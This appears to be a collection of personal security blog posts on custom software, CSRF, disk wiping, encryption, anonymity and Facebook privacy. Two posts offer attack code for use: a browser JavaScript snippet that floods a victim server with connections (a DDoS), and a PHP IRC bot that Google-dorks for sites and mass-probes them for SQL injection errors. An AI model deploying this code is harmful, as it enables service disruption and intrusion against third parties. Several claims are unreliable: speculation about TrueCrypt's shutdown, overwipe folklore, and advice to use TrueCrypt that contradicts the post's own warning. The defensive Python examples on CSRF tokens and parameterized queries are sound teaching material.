Software Quality and Security

Hello friends, it’s been a while, a long while. Today I am going to talk about software quality and security.

Web services are being penetrated in many ways every day. Why?

One of the main reasons this is happening is that most companies and software developers use open-source, ready-to-go, all-inclusive software to minimize the workload and hours needed and to promote better delivery times. But this poses threats: anyone can get a copy of the code you are running and try to find vulnerabilities and ways to exploit it directly, or the systems residing underneath it.

Could this be prevented, or at the very least made harder for intruders to successfully penetrate? And if so, how?

I always hear the same argument: time equals money, and quality costs. But there is always a middle-ground solution for such things. Many software houses that take their business seriously create their own custom software, tailor-made to their needs and their target group (clientèle). They create the core system once and use it on all of their projects, which means higher quality, higher security as the code is proprietary (which results in the term “security through obscurity”), higher scalability, and of course they are able to meet and handle custom client demands much more efficiently.

There are more benefits to this business model, such as lower resource requirements, as the software contains exactly what it needs to run; lower development costs, as it is custom and the developers working on it are fully familiar with the code and usually do not need to rewrite parts of it or create workarounds to bypass issues; as well as keeping the staff highly educated on the latest coding techniques, principles, etc.

But there are downsides too: it costs more money to start this model, in other words you need to invest in your business model and in your team; it takes more time for the first deployment; and it takes highly skilled staff to develop it. But in the long run it will become a very good investment versus the chaotic open-source approach, which is led by third-party communities: this year their software may suit your needs, but next year it may not, or may not exist at all.

The final decision is yours. Personally, as a software engineer, I take the custom approach: a custom core system, used on all my clients and constantly expanded; the more I expand it, the less I need “ready to go” conventions.

Have a nice day!

 

JavaScript Apache DDoS

Something quick to share with you before I forget it 🙂

<html><body>
<script>
       for (var i = 0; i < 100; i++) {
             var img = new Image();
             var url = 'ftp://victim.com:80/?'+i;
             img.src = url;
       }
</script>
</body></html>

I use ftp because http has a limit of 6 simultaneous connections per host in most browsers; ftp, on the other hand, has no such limit as of the day I write this post.

Be sane on how you use it!!!

(Original attack demonstration on BlackHat 2013, Las Vegas)

IRC Client – Website Vulnerability scanner

Hey guys,

This script can now only be used as a template to create a PHP-based IRC client/bot; its vulnerability scanning functions are useless these days.

This one comes from the Dark Ages of GRnet, enjoy 🙂

In any case, I do not take any responsibility for how the script runs and what errors might pop up on your computer.

<?php

set_time_limit(0);

/**
 * @author Atlantean.
 */

//########################INFORMATION##################################

$server = "global.irc.gr";
$port = 6667;
$me = "php_scanner";
$channel = "#scripting";
$identify = "id";
$master = array("Atlantean");

//EDIT THIS
$max_results = 500; // maximum Google results //
$threads = 10; //URLS TO test IN the same time!!

//#####################################################################

$search = array("mysql_num_rows()", "mysql_fetch_rows()", "main(", "extract()",
    "mysql_result()", "Syntax Error", "You Have An error", "mysql error",
    "SQL ERROR", "Warning: ");
//###############################SERVER WRITE##########################

$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if (!socket_connect($socket, $server, $port))
{
    echo "\n[-]Unable To connect...\n\n\n";
    exit;
}

socket_write($socket, "USER php 127.0.0.1 PHP :PHP Bot\nNICK $me\nJOIN :$channel\n");


//###############################Encode The Dork#############################

function encodeDork($s)
{
    $tmp = "";
    for ($i = 0; $i < strlen($s); $i++)
    {
        $tmp .= "&#" . hexdec(bin2hex($s[$i])) . ";";
    }
    return urlencode($tmp);
}

//###############################cURL MULTI THREAD#############################

function ExecHandle(&$curlHandle)
{
    $flag = null;
    do
    {
        curl_multi_exec($curlHandle, $flag);
    } while ($flag > 0);
}


while ($read = socket_read($socket, 2048))
{
    $cmd = explode(" ", $read);
    $nick = explode(':', $cmd[0]);
    $nick = explode('!', $nick[1]);
    $nick = strtolower($nick[0]);

    switch ($cmd[1])
    {
        case "KICK":
            if ($cmd[3] == $me)
            {
                socket_write($socket, "\nJOIN :" . $channel . "\n");
            }
            break;
        case "PRIVMSG":
            if (in_array($nick, $master))
            {
                switch (str_replace(array(chr(10), chr(13)), '', $cmd[3]))
                {
                    case ":!join":
                        socket_write($socket, "\nJOIN :" . $cmd[4] . "\n");
                        break;
                    case ":!exit":
                        exit(socket_write($socket, "\nQUIT :Connection Lost\n"));
                        break;
                    case ":!part":
                        socket_write($socket, "\nPART :" . $cmd[4] . "\n");
                        break;
                    case ":!sql":
                        if (!isset($cmd[4]))
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[-] Enter Dork!\r\n");
                        } else
                        {
                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                "12[+] SQL Vulnerabilty Scan Started ...\nPRIVMSG $channel :" . chr(3) . "4$nick " .
                                chr(3) . "12[+] Dork : $cmd[4] \r\n");

                            $vuln_array = array();

                            $google = "http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=0";

                            $ch = curl_init($google);
                            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                            curl_setopt($ch, CURLOPT_HEADER, 0);
                            $ret = curl_exec($ch);
                            curl_close($ch);

                            if (stristr($ret, '302 Moved') != false)
                            {
                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[-] Banned From Google!! \r\n");
                                break;
                            }

                            preg_match_all("/of( about)* <b>([\d,]+)<\/b>/", $ret, $max);
                            $max = str_replace(",", "", $max[2][0]);

                            $max = $max > $max_results ? $max_results : $max;
                            $i = 0;

                            while ($i < $max)
                            {

                                $ch = curl_init("http://www.google.com/search?q=" . encodeDork($cmd[4]) . "&start=" . $i);
                                curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
                                curl_setopt($ch, CURLOPT_HEADER, 0);
                                $ret = curl_exec($ch);

                                preg_match_all("/<h3 class=r><a href=\"(.*?)\"/", $ret, $links);

                                if (@$links[1])
                                {
                                    foreach ($links[1] as $l)
                                    {
                                        if (strpos($l, '=') != false)
                                        {
                                            $url = explode('=', $l);
                                            $url = $url[0] . "='";
                                            if (!in_array($url, $vuln_array))
                                            {
                                                array_push($vuln_array, $url);
                                            }
                                        }
                                    }
                                }

                                curl_close($ch);
                                $i = $max > 10 ? $i += 10 : $i++;
                            }

                            array_unique($vuln_array);
                            sort($vuln_array);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Got " . count($vuln_array) . " Valid URLs! Injection Started...\r\n");

                            $p = 0;
                            $o = $threads;

                            $curlHandle = curl_multi_init();

                            do
                            {

                                $tmp = count($vuln_array);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $cURL[$i] = curl_init($vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_URL, $vuln_array[$i]);
                                    curl_setopt($cURL[$i], CURLOPT_HEADER, 0);
                                    curl_setopt($cURL[$i], CURLOPT_RETURNTRANSFER, true);
                                    curl_multi_add_handle($curlHandle, $cURL[$i]);
                                }

                                ExecHandle($curlHandle);

                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    $source[$i] = curl_multi_getcontent($cURL[$i]);
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    foreach ($search as $error)
                                    {
                                        if (stristr($source[$i], $error) != false)
                                        {
                                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                                "12[+] Possible Bug Found: $vuln_array[$i]\n");
                                            $p++;
                                            break;
                                        }
                                    }
                                }


                                for ($i = 0; $i < $threads && $i < $tmp; $i++)
                                {
                                    curl_multi_remove_handle($curlHandle, $cURL[$i]);
                                    unset($vuln_array[$i]);
                                }
                                sort($vuln_array);

                                socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) .
                                    "12[+] Scanned $o...\r\n");
                                $o += $threads;

                                unset($source);
                                unset($cURL);

                            } while (count($vuln_array) > 0);

                            curl_multi_close($curlHandle);

                            unset($vuln_array);
                            unset($source);
                            unset($cURL);

                            socket_write($socket, "\nPRIVMSG $channel :" . chr(3) . "4$nick " . chr(3) . "12[+] Done. $p Bugs Found.\r\n");
                        }
                        break;
                }
            }
            break;
    }

    if ($cmd[0] == "PING")
    {
        socket_write($socket, "PONG " . $cmd[1] . "\n");
    }
}
socket_close($socket);
?>

CSRF attack

It’s been a long time since I last blogged, but some of the things I took on were very time-consuming. Today we’ll talk about CSRF.

CSRF? What is that?

CSRF stands for cross-site request forgery, and it almost always leads to bad, nasty things. It can damage your bank account balance; it acts on your behalf in your website activities without your consent, or even your knowledge, until it’s far too late.

However, if a website has taken precautions against this type of attack, such as CSRF one-time tokens, the attack is rendered completely harmless, because the web server will not accept requests forged by third parties.

For more details, one good article I spotted is: https://www.acunetix.com/websitesecurity/csrf-attacks/
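One way to implement the one-time token check described above, as an added example in Python (not code from the original post or from the linked article): the server issues a random token bound to the session when it renders the form and accepts it exactly once, so a request forged from another site, which carries the victim's cookie but not the token, is refused. The Request model, CsrfGuard class and transfer endpoint are constructed for this example.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """What the server sees for one POST: the session cookie the browser
    attaches automatically, and the submitted form fields (constructed model)."""
    session_id: str
    form: dict = field(default_factory=dict)


class CsrfGuard:
    """Synchronizer-token pattern: every rendered form gets a fresh random
    token bound to the session, and a token is accepted exactly once."""

    def __init__(self):
        self._outstanding = {}  # session_id -> set of not-yet-used tokens

    def issue(self, session_id):
        token = secrets.token_urlsafe(32)
        self._outstanding.setdefault(session_id, set()).add(token)
        return token

    def consume(self, session_id, token):
        if not isinstance(token, str) or not token:
            return False
        tokens = self._outstanding.get(session_id, set())
        match = None
        for candidate in tokens:
            # constant-time comparison: a wrong token takes as long as a right one
            if hmac.compare_digest(candidate.encode(), token.encode()):
                match = candidate
                break
        if match is None:
            return False
        tokens.remove(match)  # one-time: replaying the same token fails
        return True


def transfer(guard, balances, req):
    """State-changing endpoint. A page on another site can make the victim's
    browser send this POST with the victim's cookie, but it cannot read the
    token embedded in the real form, so the check rejects the forged request."""
    if not guard.consume(req.session_id, req.form.get("csrf_token")):
        return 403, "CSRF token missing, invalid or already used"
    amount = int(req.form["amount"])
    balances[req.session_id] -= amount
    return 200, f"moved {amount}"


def demo():
    """Returns the status codes of three requests and the final balance."""
    guard = CsrfGuard()
    balances = {"alice-session": 100}
    token = guard.issue("alice-session")  # server renders the form with this token
    forged = Request("alice-session", {"amount": "50"})  # cookie present, token absent
    real = Request("alice-session", {"amount": "30", "csrf_token": token})
    codes = [transfer(guard, balances, forged)[0],
             transfer(guard, balances, real)[0],    # genuine submission
             transfer(guard, balances, real)[0]]    # replay of the same token
    return codes, balances["alice-session"]


if __name__ == "__main__":
    print(demo())
```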

Aimilios

 

TrueCrypt no longer supported

Hello fellow security conscious citizens of the Internet!

On the 24th of May 2014 the TrueCrypt organization stopped the support and development of its industry-leading encryption project, “TrueCrypt”, which provided powerful encryption to thousands of computers, claiming to have done so because Microsoft stopped Windows XP support.

Well that’s bollocks if you ask me 🙂

Governmental agencies probably found these so-called “anonymous” developers and either bribed or forced them to stop the development of TrueCrypt, as it stonewalled governments from obtaining digital data and building cases against criminals, or they were bought off; whatever the scenario, I highly doubt anyone with an average IQ believes the official statement of TrueCrypt.

Now the important thing: alternatives to TrueCrypt? Many, many, many of them, so there’s no need to worry; just migrate from TrueCrypt to a similar OPEN-SOURCE application. One similar to TrueCrypt is DiskCryptor.

WARNING: In my opinion, don’t even run or install TrueCrypt 7.2, because I believe it contains malware that could expose your data to the third parties that had something to do with this security scandal.

Data security

Is your data safe? Probably not if you haven’t taken precautions.

DATA WIPING / DATA MINING

First of all, let’s make something clear: deleting a file means deleting its entry from the hard disk, and unless it’s overwritten with something else it still exists. So formatting and reformatting won’t save you unless you wipe your hard disk; wiping solid-state devices is a little more complicated, so I won’t go into details.

So if you want to sell your hard drive, wipe it first several times; usually 3 or 7 wipes, known as the DoD standard wipe, are enough to make all the data unrecoverable without someone spending a fortune ($100.000,00) on examining the hard drive with advanced equipment. If it’s an SSD, use the wiping software provided by its manufacturer. If it’s a USB flash drive, the best you can do is overwrite it a gazillion times, or just burn it, literally.

ON-LINE CLOUD SERVICES

You want your files backed up? Don’t use cloud services without encrypting the files before transmission (upload), even though encryption can be broken, depending on who is trying to break it and the computing power they have. All the sites advertise that their servers are encrypted, blah blah, but you can never verify it for sure. So two things: never upload unencrypted files, and never upload important files like business projects etc. Bottom line: encryption can be broken, which means clouds are insecure.

FULL DISK(SYSTEM) ENCRYPTION (FDE)

Thousands of computers are stolen every hour, mostly laptops, smartphones, tablets and netbooks, and less often desktops. Front-end passwords won’t save you, so here comes full disk encryption to protect your data by making it accessible only by entering the right passphrase/key/password and/or some key file (some mp3 song, for example) that only you know about and carry with you on a USB flash drive attached to your key chain. Forget Windows, Mac or Android encryption; use open-source software like TrueCrypt to make sure there are no backdoors, use at least 128-bit encryption and a password of at least 26 mixed characters (numbers, letters, special chars) to make it virtually impossible for anyone to crack the encryption in the near future. Note that everything can be cracked; however, if it requires 1.000.000.000.000 years, it’s a safe bet no one will ever try.

BOTTOM LINE

Bottom line: wipe your drives, encrypt your entire drives, shred your files instead of simply sending them to the trash can or recycle bin, use off-line encrypted hard drives for backups, and finally use strong passwords for your accounts.

Soon there will be more security articles about firewalls, internet security, encrypted data transmission and more.

Wanna go off the grid and erase everything that circulates about you on the internet?

Not possible.

There are only a few things you can do to make it harder for people to find your internet trail.

You have an email account? Change your info to some random info, save, and then cancel it. The same goes for similar accounts.

You have an e-banking account? Demand that your bank disable this specific service for you.

MSN? Cancel it.

Facebook? Erase any trail left (for example pictures, notes, friends) and then cancel. DO NOT DE-ACTIVATE; CANCEL THROUGH HELP ME.

Skype? It cannot be canceled, but you can alter your real profile into a fake one.

Have a personal website? Cancel it via the hosting company.

Remember, everything can be cached by search engines or web servers, or saved to local hard drives. Example: I posted my pic on Facebook, some friend of mine saved it on his computer; nothing can be done about it.

That’s all you can do to protect yourself. And of course IP logs are off the table.

 

 

Internet and Anonymity

Is it possible to hide my existence on the internet? You’re pretty much asking if you can exist and not exist at the same time.

However there are ways to make it much harder for someone to identify you on the web. The keyword here is “proxies”.

A proxy is the middleman between you and the remote server. But (there’s always a but) the data travels “you > ISP > proxy > proxy’s ISP > target’s ISP > target (the remote server you want to reach)” and back, which means that someone with access to the ISPs’ logs and activity can track you easily; that’s probably CIA-level clearance and agencies of the same level.

They say keep your friends close and your enemies closer; wise dude, whoever said that.

Everything should be analyzed from the inside. So if I had all these clearances, I would:

1) Create a time window of the attack.

2) Check the target’s activity logs to find out which server was used as a proxy. (Let’s say we have 1000 different connections in the logs.)

3) Examine these 1000 connections and cross-check them against their own activity logs; the results should be cross-checked within the time window.

4) You have the original IP, unless it was a proxy too; in that case there are many more activity logs to check, but it’s still traceable. Using the same technique as above, at some point you will get the original IP.
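The four steps above as a worked example in Python, added here and not part of the original post. The logs, IP addresses and time window are constructed; the example assumes every relay's log records the client it served and the final destination requested, and it treats a hop with no matching upstream entry (or no obtainable log) as the origin, or as the point where the trail goes cold.

```python
from datetime import datetime

# Constructed sample data. Log line format: "<ISO timestamp> <client_ip> -> <dest_ip>".
TARGET_IP = "203.0.113.10"
WINDOW = (datetime(2014, 6, 1, 12, 0, 0), datetime(2014, 6, 1, 12, 5, 0))  # step 1

# The target's own activity log (step 2 reads this).
TARGET_LOG = """\
2014-06-01T12:00:05 198.51.100.7 -> 203.0.113.10
2014-06-01T12:01:10 198.51.100.23 -> 203.0.113.10
2014-06-01T12:02:40 198.51.100.23 -> 203.0.113.10
2014-06-01T11:10:00 198.51.100.40 -> 203.0.113.10
"""

# Logs obtained (via their ISPs) for hosts that show up as clients; a host
# missing from this dict is one whose logs could not be obtained.
RELAY_LOGS = {
    "198.51.100.23": """\
2014-06-01T12:01:08 192.0.2.55 -> 203.0.113.10
2014-06-01T12:02:38 192.0.2.55 -> 203.0.113.10
2014-06-01T09:00:00 192.0.2.9 -> 203.0.113.10
""",
    "192.0.2.55": """\
2014-06-01T12:01:07 192.0.2.200 -> 203.0.113.10
""",
    # 198.51.100.7 relayed nothing to the target in the window: a direct client.
    "198.51.100.7": """\
2014-06-01T12:00:04 192.0.2.77 -> 198.51.100.99
""",
}


def parse(log_text):
    """Yield (timestamp, client_ip, dest_ip) tuples from the constructed format."""
    for line in log_text.splitlines():
        if line.strip():
            ts, client, _arrow, dest = line.split()
            yield datetime.fromisoformat(ts), client, dest


def clients_toward(log_text, dest, window):
    """Steps 2 and 3: clients this host relayed to `dest` inside the window."""
    start, end = window
    return {c for ts, c, d in parse(log_text) if d == dest and start <= ts <= end}


def trace(hop, logs, dest, window, seen=()):
    """Step 4: follow a hop back through its own log until a host with no
    matching upstream entry is reached. Hosts already in the chain are
    skipped so a looping relay cannot cause infinite recursion."""
    chain = (*seen, hop)
    upstream = clients_toward(logs.get(hop, ""), dest, window) - set(chain)
    if not upstream:
        return [list(chain)]
    chains = []
    for nxt in sorted(upstream):
        chains.extend(trace(nxt, logs, dest, window, chain))
    return chains


def investigate(target_log, relay_logs, target_ip, window):
    """Run steps 2-4 for every candidate seen at the target in the window.
    Returns one chain per candidate, ending at the presumed origin."""
    chains = []
    for candidate in sorted(clients_toward(target_log, target_ip, window)):
        chains.extend(trace(candidate, relay_logs, target_ip, window))
    return chains


if __name__ == "__main__":
    for chain in investigate(TARGET_LOG, RELAY_LOGS, TARGET_IP, WINDOW):
        print(" <- ".join(chain))
```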

Of course, the original IP may have nothing at all to do with the attack, if the attacker has hacked into a Wi-Fi network or Bluetooth, or it’s an internet cafe or public Wi-Fi. Then the digging goes much deeper: routers should be seized and checked for the latest MAC addresses, cell towers will be needed to triangulate the cell phones that were in the area within the time window, and much more. Probably no one will dig so far unless it’s critical.

Keep in mind that all of the above can be processed within seconds.

Satellites can be used too, to determine who was where and did what. There’s no way to escape unless they let you.

Some advice for hiding your tracks easily.
Wanna hide your IP from some site? It can be done: use an HTTP proxy, or some secure SOCKS4 or SOCKS5 proxy, or use the Tor network.
Never ever attempt anything illegal, because if they want to get you, they will get you; the house always wins.

Everything said was for educational purposes and should NOT be used for illegal activities.

Can my site be hacked?

The answer is yes, but let’s clear some things up below.

First of all, in order to be hacked, the hacker has to find vulnerabilities, which takes some time that they would rarely spend if you are not a target. Everything can be hacked.

Usual vulns/hacks/backdoors

Usually the hackers are searching for PHP vulnerabilities in the code your site is running, whether it is some popular CMS you downloaded or custom PHP code written by you or by the company that created your site. Some PHP penetration examples are SQL injection, using the $_POST and $_GET inputs to their advantage.
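An added example in Python with sqlite3 (not code from the original post) of the $_GET/$_POST-driven SQL injection mentioned above: the same user input goes through a query built by string concatenation and through a parameterized one. The table, rows and inputs are constructed; the vulnerable version also surfaces the database error text that the IRC scanner earlier on this page greps for, which is why such errors must never reach the client.

```python
import sqlite3


def make_db():
    """Constructed sample table standing in for a site's user database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, email TEXT)")
    conn.executemany("INSERT INTO users (name, email) VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def lookup_vulnerable(conn, name):
    """The PHP anti-pattern: the request parameter is concatenated into the
    query text, so the database parses whatever the client sent as SQL."""
    sql = "SELECT name, email FROM users WHERE name = '" + name + "' ORDER BY id"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    """Parameterized query: the input is bound as a value and can never
    change the structure of the statement."""
    return conn.execute(
        "SELECT name, email FROM users WHERE name = ? ORDER BY id", (name,)
    ).fetchall()


def probe(conn, name):
    """Run one input through both versions. The vulnerable one may raise, and
    that error text is exactly what 'Syntax Error' / 'mysql error' heuristics
    look for; the safe one simply returns no rows for malformed input."""
    try:
        vulnerable = lookup_vulnerable(conn, name)
    except sqlite3.Error as exc:
        vulnerable = f"error: {exc}"
    return vulnerable, lookup_safe(conn, name)


if __name__ == "__main__":
    db = make_db()
    # "o'brien" is an ordinary name with a quote; the last one is a textbook injection.
    for user_input in ["alice", "o'brien", "' OR '1'='1"]:
        print(repr(user_input), "->", probe(db, user_input))
```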

Most sites are hosted on shared computers, which doesn’t necessarily mean that if I’m not careful they can reach your site through mine, but it happens from time to time, depending on how secure and independent your account is; a shared computer doesn’t always mean linked configs. They did in the past; now most companies don’t allow global configs, and each account has its own safety configuration & settings.

A backdoor can be anything: an email you misplaced on your server, or something entirely different, for example a plugin you installed on your WordPress or Joomla or Drupal or whatever else!

The favorite attack is DDoS (distributed denial of service), which sends more packets to your IP than your connection can download, as a result slowing your site temporarily or shutting it off from the web completely. Of course it is still accessible through some advanced panels or local connections. There are certain ways to protect yourself from DDoS, such as software, firewalls or, in some cases like banks, organizations like NASA, agencies etc., hardware. Note this: nothing can protect you from 100.000.000 zombie computers attacking your network; even the CIA has been DDoSed and went off for a day.

That’s it for today!

Facebook and content copyrights

Hello everyone,

Did you know that for every picture, personal photograph, piece of content, post or action you make, you give up your copyrights and Facebook can do with it whatever it wants? I am sure 95% of Facebook users do not know that.

The truth can sometimes be cruel, but Facebook probably has more data than your government, and more reliable and up-to-date data too; it knows things about you and your “friends” that even the F.B.I. doesn’t. They can create psychological profiles for every single user.

They use our personal data for marketing; companies invest in the statistics they produce on a daily basis, which can be political exit polls, sports, athletes, games, pretty much anything you can think of.

Account deletion: they only let you deactivate the service; however, in the help section there is a deletion option, though I doubt people know about it, and even that requires a few weeks of inactivity. And of course, once Google has cached your page, it may still be accessible via advanced searches.

On the other hand, let’s face it, Facebook is useful for staying in touch with people all around the world, mostly on-line friends from on-line games, chat rooms etc.

It’s completely up to you whether you need Facebook or not. I’m a programmer, and a gamer too; I know what I signed up for, and when I no longer need it, I will just delete it.

The best you can do is decide whether you really need Facebook or are just logging in and out when you’re bored. You know your needs.